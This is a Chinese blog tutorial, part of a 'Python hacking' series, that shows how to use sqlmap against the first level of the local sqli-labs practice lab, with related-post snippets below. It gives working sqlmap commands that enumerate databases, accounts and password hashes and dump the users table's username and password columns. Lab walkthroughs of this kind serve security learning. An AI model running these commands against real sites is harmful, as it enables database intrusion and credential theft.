Python黑客攻防(七)运用sqlmap对sqli-labs进行SQL注入

最新推荐文章于 2024-05-06 18:59:53 发布
最新推荐文章于 2024-05-06 18:59:53 发布
阅读量2.4k 收藏 17
点赞数 1
分类专栏: Python黑客编程 文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43681532/article/details/107375442
版权

前言:

本篇主要讲解sqlmap的基本使用,对sqli-labs靶场的第一关进行SQL注入。后续九关的解题方法都和这个差不多,可以自己网上查资料学习,如果有时间也会更新对后续关卡的通关步骤。

sqlmap基础命令:

sqlmap支持多种选项,-u 选项表示后面出现的是URL, --level 选项表示要执行的测试级别,–risk选项用于设置待执行测试的风险。风险表示攻击所用SQL代码的危险程度,风险等级越高,表示相关网站出现问题的可能性越高。

  • -level选项

0:仅输出Python反向追踪( Trackback )信息、错误及重要信息( Critical Message)。
1:显示信息与警告信息。该值为默认值。
2:同时显示所有调试信息。
3:同时显示插入的有效载荷信息。
4:同时显示HTTP请求信息。
5:同时显示HTTP响应头信息。
6:同时显示HTTP响应页面内容信息。

–risk选项

1:注入无问题代码,执行测试。默认值。
Normal Injection (使用union)、Blind Injection (使用ture:1=1, flase:1=2 )
2:执行Time- -based Injection using heavy query。进行Blind Injection时,若不论真假都有相同结果值,则经过指定的待机时间后,通过测定时间判断插入的查询是否得以执行。

3:使用OR- based Injection。若被攻击的目标程序执行update语句,则插入的or语句就会导致致命问题。

–dbms选项

指定要使用的数据库类型。若不指定,则对sqlmap支持的所有类型的数据库探测漏洞。

1.清除sqlmap缓存:
python sqlmap.py --purge

2.检测注入点是否可用
python sqlmap.py -u "目标URL" 

3.暴库
python sqlmap.py -u "目标URL" -dbs

4.暴当前使用的数据库
python sqlmap.py -u "目标URL" –current-db

5.暴当前使用的账户
python sqlmap.py -u "目标URL" –current-user

6.列出所有使用过的账户
python sqlmap.py -u "目标URL" –users

7.mysql的登录账户和密码
python sqlmap.py -u "目标URL" –passwords

8.列出数据库中的表
python sqlmap.py -u "目标URL" -D "指定数据库名" –tables

9.列出表中字段
python sqlmap.py -u "目标URL" -D "指定数据库名" -T "指定的表名" –columns

10.爆字段内容
python sqlmap.py -u "目标URL" -D "指定数据库名" -T "指定的表名" -C "字段名" -dump

步骤:

1.先开启靶场,第一次使用靶场要对数据库进行设置。点击如下图的Setup/reset DataBase forlabs。然后返回这个界面,下拉点击Less-1进入第一关。
在这里插入图片描述在这里插入图片描述 2.在地址栏输入如下图“/?id=1”登录数据库。在这里插入图片描述 3.打开sqlmap,输入如下命令对数据库进行暴库。(输入命令的过程中请注意靶场路径,不可使用中文字符)


python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --leve=5 --risk=3 --dbs

在这里插入图片描述在这里插入图片描述 4.如上图可知数据库为MySQL,是否要跳过特定于其他dbms的测试有效负载?输入n。再如下图提示是否测试其他,输入n.找到数据库类型和确定有注入点可利用全部数据库也爆出来了。在这里插入图片描述在这里插入图片描述
5.运行下面命令查看我们所在的数据库。运行下面的命令后可也看到我们所属的数据库为“security”。


python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --leve=5 --risk=3 --dbms=mysql --current-db

在这里插入图片描述
6.运行命令查看数据库中的表。

python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --leve=5 --risk=3 --dbms=mysql -D "security" --tables

在这里插入图片描述
7.猜测users表中应该有我们想要的数据,运行下方命令获取user表中的字段。


python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --leve=5 --risk=3 --dbms=mysql -D "security" -T "users" --columns

在这里插入图片描述8.显示我们想要的“password,username”字段。输入如下命令成功获取我们要的数据。SQL注入演示完毕。


python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --leve=5 --risk=3 --dbms=mysql -D "security" -T "users" -C "password,username" --dump

在这里插入图片描述
欢迎关注微信公众号:黑客帮。获取更多

肥胖喵
关注
  • 1
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Sqlmap使用(sqli-lab
Mccc_li的博客
05-06 3564
1.get使用方法: 1.查看是否有注入点:sqlmap -u 网址 2.爆出数据库名:sqlmap -u 网址 --dbs 5.爆出数据库的表名:sqlmap -u 网址 -D security --tables 6.爆出数据库的列名:sqlmap -u 网址 -D security -T users --columns 7.dump出数据:sqlmap -u -D security -...
sqli-labs(php7.3以上可运行)
01-29
sqli-labs中,你可以扮演黑客的角色,尝试找出并利用SQL注入漏洞,这有助于提升你的安全意识和测试技能。渗透测试工具如Burp Suite、Sqlmap等,可以辅助进行自动化扫描和漏洞利用。 五、漏洞环境 sqli-labs提供了...
Web安全第4讲 - sqlmap性能优化&sqlmap注入参数&sqlmap注入技术参数
Yauger的博客
02-14 529
一、sqlmap性能优化 1.1 sqlmap设置持久HTTP连接(长连接) sqlmap中可以设置连接为持久连接。HTTP报文中设置 connection:keep-alive 命令行: python sqlmap.py -u "http://127.0.0.1/sqli/Less-1/?id=1" --keep-alive --banner 1.2 sqlmap设置不接收HTTP B...
2024年网络安全-sqlmap实战之sqlilabs-Less5_sqlmap打less5,网络安全基础学习教程
最新发布
2401_84253089的博客
05-06 833
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
sqli-labs靶场使用sqlmap自动化注入
星虐
03-15 1225
1.检测存在注入 命令:sqlmap -u ‘http://192.168.1.17/sqli-labs/Less-1/?id=1’ 2.爆出所有数据库名称 命令:sqlmap -u ‘http://192.168.1.17/sqli-labs/Less-1/?id=1’ --dbs 3.爆出security库中的所有表 命令:sqlmap -u ‘http://192.168.1.17/sqli-labs/Less-1/?id=1’ -D security --tables 4.爆出users表中的
sqlmap命令_Python黑客攻防(八)运用sqlmapsqli-labs进行SQL注入
weixin_39680208的博客
11-21 1090
前言:本篇主要讲解sqlmap的基本使用,对sqli-labs靶场的第一关进行SQL注入sqli-labs靶场搭建->Python黑客攻防(六)sqli-labs环境搭建 ,后续九关的解题方法都和这个差不多,可以自己网上查资料学习,如果有时间也会更新对后续关卡的通关步骤,在进行SQL注入前,我们先对sqlmap基础命令进行简单了解。sqlmap基础命令:sqlmap支持多种选项,-u 选项...
在CentOS7中搭建sqli-labs环境以及使用sqlmap对其进行sql注入
m0_53499553的博客
04-04 6799
目录 安装docker 使用docker拉取sqli-labs的镜像 对我们使用到的sqlmap的参数解释 使用Kali中自带的sqlmap进行sql注入 安装docker 因为我们是使用docker去搭建sqli-labs,所以在CentOS7中搭建sqli-labs环境之前需要先安装docker(如果安装过,可以直接去执行安装完docker的后续步骤) 安装需要的软件包,yum-util 提供yum-config-manager实用程序,另外两个是devicemapper驱动依赖的,需要.
sqlmap使用_SQLMapSQLi注入防御
weixin_39557402的博客
12-08 279
第一部分:Sqlmap使用1.1 sqlmap介绍1. 前边说了一些sql注入的基础语句,但是手工注入很麻烦,我们可以借助sqlmap这个强大的sql注入工具,进行数据的获取.2. sqlmap介绍(1)#sqlmap是一种开源的渗透测试工具,可以自动检测和利用SQL注入漏洞以及接入该数据库的服务器。它拥有非常强大的检测引擎、具有多种特性的渗透测试器、通过数据库指纹提取访问底层文件系统并...
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs》是一本深入探讨SQL注入技术的专业资料,结合了sqli-labs实战平台,旨在帮助读者强化对SQL注入的理解和防御能力。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码...
sqli-labs.rar
12-22
此外,随着你逐渐熟悉sqli-labs中的挑战,你可以尝试使用自动化工具如sqlmap进行自动化注入测试,这将帮助你理解攻击者可能使用的工具和技术。 最后,别忘了实践是最好的老师。完成sqli-labs的所有挑战后,你应该对...
sqli-labs.zip
12-31
总的来说,"sqli-labs.zip"是一个全面的SQL注入学习资源,不仅适合希望增强自己网络安全技能的个人,也适合教育机构和企业进行内部培训,以提升员工对SQL注入攻击的防范意识和应对能力。通过这个学习环境,学习者...
sqli-labs-master.zip
05-26
Sqli-labs是专为学习SQL注入而设计的实战教程,由印度程序员创建,提供了一系列逐步升级的挑战,帮助用户从基础到高级理解SQL注入的原理和防御方法。在这个"SQL注入教程"中,你可以通过参与不同级别的实验,深入理解...
SQL注入(使用sqli-labs案例以及sqlmap自动化注入工具)
04-29 4895
SQL注入sqli-labs: 一个实验平台,里面有完整的SQL注入课程,需要phpstudy环境,因此先安装phpstudy环境 phpstudy: https://www.xp.cn/ 安装后发现数据库和我本机的数据库出现冲突了,只能使用 sc delete mysql 删掉我本机的mysql8服务,如果需要使用原来的mysql,管理员命令下输入 mysqld --install 删除之后成功启动 启动成功后,去下载sqli-labs: https://github.com/Audi-1/
利用SQLmap进行一次SQL注入
m0_73303597的博客
11-27 693
自用
利用Sqlmap进行SQL注入攻击
m0_62689523的博客
08-14 1771
sqlmap简介 sqlmap是一款基于python的渗透测试工具,在sql检测和利用方面功能强大,支持多种数据库。 功能:sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。.........
sqlmap进行SQL注入
weixin_45095113的博客
03-16 523
sqlmapSQL注入
SQLMAP脚本-sql-labs-Less-28-29
m0_69844818的博客
01-03 404
HTTP参数污染(HTTP Parameter Pollution) 攻击者通过在HTTP请求中插入特定的参数来发起攻击,如果Web应用中存在这样的漏洞,可以被攻击者利用来进行客户端或者服务器端的攻击。这个labs是一个HTTP参数污染所以也简单就需要&连接一些就行了,想了解这东西的去搜索吧,这里教的是怎么脚本提供思路。使用双union绕过,编cx.py脚本。忒忒后端代码,比28简单更多。一样的使用28的脚本即可拿下。
sqlmap渗透测试
07-10 952
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。 sqlmap目前最新版本为1.1.8-8,相关资源如下: 官方网站:http://sqlmap.org/, 下载地址:https://github.com/sqlmapproject/sqlmap/zipball/master 演示视
网络安全-sqlmap实战之sqlilabs-Less9
关注网络安全、云原生安全
06-29 1109
类型 时间盲注-单引号 -dbs枚举数据库 使用-o参数优化,,--technique参数指定技术,--batch参数进行跳过 python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" -o --technique T -dbs --batch 过程 python sqlmap.py -u "http://192.168.172.128/sqli-labs_1/Less-9/?id=1" --dbms .
sqlmapsqli-labs21
11-08
根据提供的引用内容,可以得知sqlmap是一款自动化的SQL注入工具,可以用于检测和利用SQL注入漏洞。而sqli-labs是一个用于学习SQL注入的实验平台,其中包含了多个不同难度级别的SQL注入漏洞。因此,sqlmap可以用于对sqli-labs中的SQL注入漏洞进行检测和利用。 引用中的命令是用于获取security数据库中users表中的password和username字段的数据,其中-u参数指定了目标URL,--level和--risk参数指定了检测的深度和风险等级,-D参数指定了要操作的数据库,-T参数指定了要操作的表,-C参数指定了要获取的字段,--dump参数表示将获取到的数据输出到控制台。 引用中的命令是用于获取security数据库中users表的字段信息,其中-u、--level、--risk和-D参数的含义与引用相同,-T参数指定了要操作的表,--columns参数表示获取表的字段信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值